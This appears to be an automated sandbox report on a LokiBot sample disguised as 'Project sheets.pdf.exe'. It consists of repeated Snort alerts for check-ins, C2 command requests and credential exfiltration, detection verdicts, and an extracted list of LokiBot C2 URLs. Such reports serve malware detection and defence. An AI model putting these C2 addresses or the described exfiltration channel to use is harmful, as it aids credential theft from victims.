                Timestamp:192.168.2.3188.114.96.349885802024313 08/11/22-06:43:55.376397
                SID:2024313
                Source Port:49885
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349751802025381 08/11/22-06:42:22.964431
                SID:2025381
                Source Port:49751
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349753802021641 08/11/22-06:42:25.207102
                SID:2021641
                Source Port:49753
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349823802021641 08/11/22-06:43:13.321407
                SID:2021641
                Source Port:49823
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.96.349879802021641 08/11/22-06:43:48.403290
                SID:2021641
                Source Port:49879
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349785802825766 08/11/22-06:42:51.879415
                SID:2825766
                Source Port:49785
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349883802825766 08/11/22-06:43:53.308240
                SID:2825766
                Source Port:49883
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349750802024313 08/11/22-06:42:21.832277
                SID:2024313
                Source Port:49750
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.96.349788802025381 08/11/22-06:42:54.331478
                SID:2025381
                Source Port:49788
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349896802024313 08/11/22-06:44:07.789189
                SID:2024313
                Source Port:49896
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349748802825766 08/11/22-06:42:19.613257
                SID:2825766
                Source Port:49748
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349750802024318 08/11/22-06:42:21.832277
                SID:2024318
                Source Port:49750
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349748802025381 08/11/22-06:42:19.613257
                SID:2025381
                Source Port:49748
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349751802825766 08/11/22-06:42:22.964431
                SID:2825766
                Source Port:49751
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349793802025381 08/11/22-06:43:00.645450
                SID:2025381
                Source Port:49793
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.96.349756802021641 08/11/22-06:42:28.447484
                SID:2021641
                Source Port:49756
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349746802024313 08/11/22-06:42:17.452589
                SID:2024313
                Source Port:49746
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349882802025381 08/11/22-06:43:51.663595
                SID:2025381
                Source Port:49882
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.96.349791802025381 08/11/22-06:42:58.117986
                SID:2025381
                Source Port:49791
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349840802825766 08/11/22-06:43:28.505356
                SID:2825766
                Source Port:49840
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349766802825766 08/11/22-06:42:42.773950
                SID:2825766
                Source Port:49766
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349795802825766 08/11/22-06:43:03.020333
                SID:2825766
                Source Port:49795
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349896802024318 08/11/22-06:44:07.789189
                SID:2024318
                Source Port:49896
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349766802024318 08/11/22-06:42:42.773950
                SID:2024318
                Source Port:49766
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349828802025381 08/11/22-06:43:14.503252
                SID:2025381
                Source Port:49828
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349747802024318 08/11/22-06:42:18.537201
                SID:2024318
                Source Port:49747
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.96.349764802024318 08/11/22-06:42:41.209817
                SID:2024318
                Source Port:49764
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349898802025381 08/11/22-06:44:09.907279
                SID:2025381
                Source Port:49898
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349795802021641 08/11/22-06:43:03.020333
                SID:2021641
                Source Port:49795
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349774802025381 08/11/22-06:42:44.099150
                SID:2025381
                Source Port:49774
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349747802024313 08/11/22-06:42:18.537201
                SID:2024313
                Source Port:49747
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349840802025381 08/11/22-06:43:28.505356
                SID:2025381
                Source Port:49840
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.96.349752802021641 08/11/22-06:42:24.044623
                SID:2021641
                Source Port:49752
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.96.349788802825766 08/11/22-06:42:54.331478
                SID:2825766
                Source Port:49788
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349892802024318 08/11/22-06:44:04.916628
                SID:2024318
                Source Port:49892
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349750802825766 08/11/22-06:42:21.832277
                SID:2825766
                Source Port:49750
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349797802024318 08/11/22-06:43:05.379365
                SID:2024318
                Source Port:49797
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.96.349749802024318 08/11/22-06:42:20.745320
                SID:2024318
                Source Port:49749
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349881802025381 08/11/22-06:43:50.015660
                SID:2025381
                Source Port:49881
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349883802024318 08/11/22-06:43:53.308240
                SID:2024318
                Source Port:49883
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349794802024313 08/11/22-06:43:01.964847
                SID:2024313
                Source Port:49794
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349875802025381 08/11/22-06:43:47.334573
                SID:2025381
                Source Port:49875
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349892802024313 08/11/22-06:44:04.916628
                SID:2024313
                Source Port:49892
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.96.349755802024313 08/11/22-06:42:27.395952
                SID:2024313
                Source Port:49755
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349838802025381 08/11/22-06:43:24.421881
                SID:2025381
                Source Port:49838
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349786802025381 08/11/22-06:42:53.219319
                SID:2025381
                Source Port:49786
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349794802024318 08/11/22-06:43:01.964847
                SID:2024318
                Source Port:49794
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.96.349764802024313 08/11/22-06:42:41.209817
                SID:2024313
                Source Port:49764
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.96.349749802024313 08/11/22-06:42:20.745320
                SID:2024313
                Source Port:49749
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349757802021641 08/11/22-06:42:29.610436
                SID:2021641
                Source Port:49757
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349785802021641 08/11/22-06:42:51.879415
                SID:2021641
                Source Port:49785
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349883802024313 08/11/22-06:43:53.308240
                SID:2024313
                Source Port:49883
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349766802021641 08/11/22-06:42:42.773950
                SID:2021641
                Source Port:49766
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349867802024313 08/11/22-06:43:45.824252
                SID:2024313
                Source Port:49867
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349805802825766 08/11/22-06:43:09.287221
                SID:2825766
                Source Port:49805
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349850802025381 08/11/22-06:43:33.879385
                SID:2025381
                Source Port:49850
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.96.349777802024318 08/11/22-06:42:45.276948
                SID:2024318
                Source Port:49777
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349853802025381 08/11/22-06:43:40.660156
                SID:2025381
                Source Port:49853
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349782802021641 08/11/22-06:42:50.570997
                SID:2021641
                Source Port:49782
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349811802825766 08/11/22-06:43:10.662100
                SID:2825766
                Source Port:49811
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.96.349744802025381 08/11/22-06:42:15.052087
                SID:2025381
                Source Port:49744
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349761802025381 08/11/22-06:42:34.002289
                SID:2025381
                Source Port:49761
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349778802024313 08/11/22-06:42:46.945645
                SID:2024313
                Source Port:49778
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349763802825766 08/11/22-06:42:39.324991
                SID:2825766
                Source Port:49763
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349852802825766 08/11/22-06:43:38.361573
                SID:2825766
                Source Port:49852
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.96.349777802024313 08/11/22-06:42:45.276948
                SID:2024313
                Source Port:49777
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349758802025381 08/11/22-06:42:30.656105
                SID:2025381
                Source Port:49758
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:188.114.97.3192.168.2.380497982025483 08/11/22-06:43:06.684563
                SID:2025483
                Source Port:80
                Destination Port:49798
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349757802825766 08/11/22-06:42:29.610436
                SID:2825766
                Source Port:49757
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349798802825766 08/11/22-06:43:06.576803
                SID:2825766
                Source Port:49798
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349859802825766 08/11/22-06:43:42.759258
                SID:2825766
                Source Port:49859
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349823802024318 08/11/22-06:43:13.321407
                SID:2024318
                Source Port:49823
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349763802021641 08/11/22-06:42:39.324991
                SID:2021641
                Source Port:49763
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349742802025381 08/11/22-06:42:12.661275
                SID:2025381
                Source Port:49742
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.96.349885802024318 08/11/22-06:43:55.376397
                SID:2024318
                Source Port:49885
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349852802021641 08/11/22-06:43:38.361573
                SID:2021641
                Source Port:49852
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.96.349755802024318 08/11/22-06:42:27.395952
                SID:2024318
                Source Port:49755
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349797802024313 08/11/22-06:43:05.379365
                SID:2024313
                Source Port:49797
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.96.349887802025381 08/11/22-06:43:58.405291
                SID:2025381
                Source Port:49887
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349830802825766 08/11/22-06:43:16.837786
                SID:2825766
                Source Port:49830
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.96.349756802825766 08/11/22-06:42:28.447484
                SID:2825766
                Source Port:49756
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: http://tixfilmz.gq/Devil/PWS/fre.phpAvira URL Cloud: Label: malware
                Source: Project sheets.pdf.exeJoe Sandbox ML: detected
                Source: 00000003.00000000.244853180.0000000000400000.00000040.00000400.00020000.00000000.sdmpMalware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}
                Source: Project sheets.pdf.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                Source: Project sheets.pdf.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: WHGDFHKDLHDJD.pdb source: Project sheets.pdf.exe, 00000000.00000002.245997342.0000000003130000.00000004.08000000.00040000.00000000.sdmp, Project sheets.pdf.exe, 00000000.00000002.246034817.00000000031D1000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: QQBCXNMHJF.pdb source: Project sheets.pdf.exe
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,

                Networking

                barindex
                Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.3:49742 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49742 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49742 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.3:49742 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49742 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.3:49743 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49743 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49743 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.3:49743 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49743 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49744 -> 188.114.96.3:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49744 -> 188.114.96.3:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49744 -> 188.114.96.3:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49744 -> 188.114.96.3:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49744 -> 188.114.96.3:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49745 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49745 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49745 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49745 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49745 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49746 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49746 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49746 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49746 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49746 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49747 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49747 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49747 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49747 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49747 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49748 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49748 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49748 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49748 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49748 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49749 -> 188.114.96.3:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49749 -> 188.114.96.3:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49749 -> 188.114.96.3:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49749 -> 188.114.96.3:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49749 -> 188.114.96.3:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49750 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49750 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49750 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49750 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49750 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49751 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49751 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49751 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49751 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49751 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49752 -> 188.114.96.3:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49752 -> 188.114.96.3:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49752 -> 188.114.96.3:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49752 -> 188.114.96.3:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49752 -> 188.114.96.3:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49753 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49753 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49753 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49753 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49753 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49754 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49754 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49754 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49754 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49754 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49755 -> 188.114.96.3:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49755 -> 188.114.96.3:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49755 -> 188.114.96.3:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49755 -> 188.114.96.3:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49755 -> 188.114.96.3:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49756 -> 188.114.96.3:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49756 -> 188.114.96.3:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49756 -> 188.114.96.3:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49756 -> 188.114.96.3:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49756 -> 188.114.96.3:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49757 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49757 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49757 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49757 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49757 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49758 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49758 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49758 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49758 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49758 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49759 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49759 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49759 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49759 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49759 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49760 -> 188.114.96.3:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49760 -> 188.114.96.3:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49760 -> 188.114.96.3:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49760 -> 188.114.96.3:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49760 -> 188.114.96.3:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49761 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49761 -> 188.114.97.3:80
